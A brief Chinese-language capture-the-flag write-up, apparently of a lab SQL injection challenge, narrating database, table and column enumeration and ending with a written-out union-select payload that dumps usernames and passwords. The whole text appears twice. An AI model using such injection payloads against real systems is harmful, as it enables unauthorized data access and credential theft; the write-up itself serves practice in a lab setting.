开搞,打开靶机
sql是真的让我头疼,先试试万能密码,没啥用
那先爆数据库
得知库名geek
爆表
得到表名为geekuser
尝试爆列名
芜湖~
那就可以直接爆数据了
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
看见可爱的括号了,查看源代码
果然又是最角落。
over.
开搞,打开靶机
sql是真的让我头疼,先试试万能密码,没啥用
那先爆数据库
得知库名geek
爆表
得到表名为geekuser
尝试爆列名
芜湖~
那就可以直接爆数据了
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
看见可爱的括号了,查看源代码
果然又是最角落。
over.